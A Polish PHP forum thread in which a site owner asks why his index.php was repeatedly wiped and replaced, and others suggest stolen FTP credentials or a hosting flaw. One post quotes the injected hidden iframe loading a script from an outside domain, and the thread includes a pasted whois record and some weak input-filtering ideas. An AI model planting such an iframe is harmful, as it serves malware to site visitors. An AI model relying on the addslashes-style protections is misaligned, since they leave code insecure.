Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

 
Reply to this topicStart new topic
> Czy strona jest dziurawa czy tylko moja pomyłka?
piotras9000
post 21.03.2008, 14:13:55
Post #1





Grupa: Zarejestrowani
Postów: 19
Pomógł: 0
Dołączył: 22.08.2007

Ostrzeżenie: (0%)
-----


Otórz wczoraj wszedłem na swoją stonę i zauważyłem że nie chce się załadować, sprawdziłem więc index.php Okazało się że jego zawartość została skasowana a na jej miejsce wpisany został kod html z niewidocznym iframe prowadzącym do http://golden-corps.com/script.php Na szczęście budowa mojego skryptu zapobiegła większym stratom. Odnowiłem index.php i od tego czasu jak na razie nic się nie zmieniło.

Moja witryna leży na http://www.gno-cms.yoyo.pl

Skrypt cały czas w budowie więc okno które się wyświetliło jest non stop. Czy ktoś może sprawdzić czy może zastosowano jakąś technike mniej mi znaną, bo sporo już w tym siedze i myślałem że wystarczająco zabezpieczyłem kod.
Go to the top of the page
+Quote Post
l0ud
post 21.03.2008, 14:29:05
Post #2





Grupa: Zarejestrowani
Postów: 1 387
Pomógł: 273
Dołączył: 18.02.2008

Ostrzeżenie: (0%)
-----


Jeżeli dzieją się takie cuda, niekoniecznie jest to przyczyną dziury w skrypcie (który chyba nie jest aż tak skomplikowany, by modyfikować pliki?). Bardziej prawdopodobne jest to, że masz wirusa bądź używasz jakiegoś pirackiego programu do uploadu plików na ftp, który wysyła Twoje hasła w niewłaściwe miejsca...


--------------------
XMPP: l0ud@chrome.pl
Go to the top of the page
+Quote Post
piotras9000
post 22.03.2008, 10:41:58
Post #3





Grupa: Zarejestrowani
Postów: 19
Pomógł: 0
Dołączył: 22.08.2007

Ostrzeżenie: (0%)
-----


Nie wiem może to tylko przypadek. W każdym razie do filtrowania forma użyłem coś takiego:
CODE
IF(strlen($_POST['login'])>6 && strlen($_POST['login'])<15 &&
strlen($_POST['pass'])<15 && preg_match("/^[0-9A-Za-z_-]{6,15}$/", $_POST['login'])
&& preg_match("/^[0-9A-Za-z_-]{6,15}$/", $_POST['pass'])) {

Chyba troche nadmiar ale raczej nie da sie nic zrobić w stylu SQL injectio prawda?
Aaa i jeszcze jedno. Do walidacji postów na forum wystarczy użyć addshlashes()? Znalazłem też funkcje urldecode(), oraz urlencode()&nbsp;Może sie przydać taka funkcja do zabezpieczenia?

Ten post edytował piotras9000 22.03.2008, 10:45:08
Go to the top of the page
+Quote Post
-=Peter=-
post 22.03.2008, 11:05:17
Post #4





Grupa: Zarejestrowani
Postów: 304
Pomógł: 51
Dołączył: 4.02.2005
Skąd: Kraków

Ostrzeżenie: (0%)
-----


Kiedyś słyszałem o podobnym przypadku, ale w nim nie kasowana była zawartość index, ale na końcu "doklejana" niewidoczna ramka. Była to wina serwera, a dokładniej dziura w CPanelu. Być może tutaj jest podobnie.


--------------------
Go to the top of the page
+Quote Post
piotras9000
post 22.03.2008, 23:20:11
Post #5





Grupa: Zarejestrowani
Postów: 19
Pomógł: 0
Dołączył: 22.08.2007

Ostrzeżenie: (0%)
-----


I znowu to samo. Tym razem na inną moją strone. Inne hasło a i ostatni raz ją modyfikowałem miesiąc temu i od tamtej pory tylko wchodziłem z przeglądarki więc to raczej wina albo serwera albo jakiegoś dobrego hackera bo więcej możliwości nie widze. Jeżeli serwera to yoyo.pl ma niezły problem :/ Tym razem mam kod który został zamieszczony. Tak jak ostatnio index.php został do cna wyczyszczony a zapisano do niego:

CODE

<!--iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe-->
<!--iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe-->
<iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>


Ten post edytował piotras9000 22.03.2008, 23:21:14
Go to the top of the page
+Quote Post
Firez
post 23.03.2008, 00:10:54
Post #6





Grupa: Zarejestrowani
Postów: 17
Pomógł: 4
Dołączył: 6.03.2008

Ostrzeżenie: (0%)
-----


Podobne włamanie (?) jest opisane tutaj - http://forum.pirotechnika.one.pl/viewtopic.php?p=139940 .
Może znajdziesz podobieństwa z włamaniem na Twoją stronę.

[EDIT]
Kolejne strony z podobnymi włamaniami: [patrz zrodlo]
http://www.eko-elw.pl/
http://www.pqn.pl/baranow-sandomierski/
http://64.233.183.104/search?q=cache:JhEFj...lient=firefox-a


Wygląda na to ze nie jest to włamanie wymierzone konkretnie w Ciebie, mi to wygląda na masówkę polegającą na dopisaniu kodu html w plikach takich jak index.html / index.php etc. Może zmień klienta ftp? BTW. Sprawdzałeś logi? - to powinno wyjaśnić czy ktoś przechwycił hasło do ftp, czy włamał się przez stronę www.

Ten post edytował Firez 23.03.2008, 00:22:41
Go to the top of the page
+Quote Post
piotras9000
post 23.03.2008, 11:00:39
Post #7





Grupa: Zarejestrowani
Postów: 19
Pomógł: 0
Dołączył: 22.08.2007

Ostrzeżenie: (0%)
-----


No właśnie widze. Sprawdziłem logi i rzeczywiście coś/ktoś się logował. Lecz bardziej mi to wygląda na robote bota niż hackera. 0 zabezpieczeń, IP osoby bez problemy namierzyłem, do tego stałe smile.gif Tylko ciekaw jestem tego że jak już sie logował to 2x nieudane i dopiero za 3 razem udane :/ Zostawie wiadomość dla tego IP smile.gif

inetnum: 89.201.164.0 - 89.201.164.255
netname: PlusHosting
descr: Plus Hosting
descr: Istarska 36
descr: 52100 Pula
country: HR
admin-c: ZG232-RIPE
tech-c: ZG232-RIPE
status: ASSIGNED PA
remarks: INFRA-AW
mnt-by: OT-MNT
source: RIPE # Filtered

person: Zvonimir Gembec
address: Plus Hosting
address: 52100 Pula
address: Croatia
abuse-mailbox: http://www.domaintools.com/registrant-sear...5acd0ffebfa8b7e
phone: +385 52 380 870
fax-no: +385 52 210 685
mnt-by: OT-MNT
nic-hdl: ZG232-RIPE
source: RIPE # Filtered

route: 89.201.128.0/17
descr: OT - Optima Telekom d.o.o.
origin: AS34594
mnt-by: OT-MNT
source: RIPE # Filtered
Go to the top of the page
+Quote Post

Reply to this topicStart new topic
1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Wersja Lo-Fi Aktualny czas: 15.06.2025 - 21:49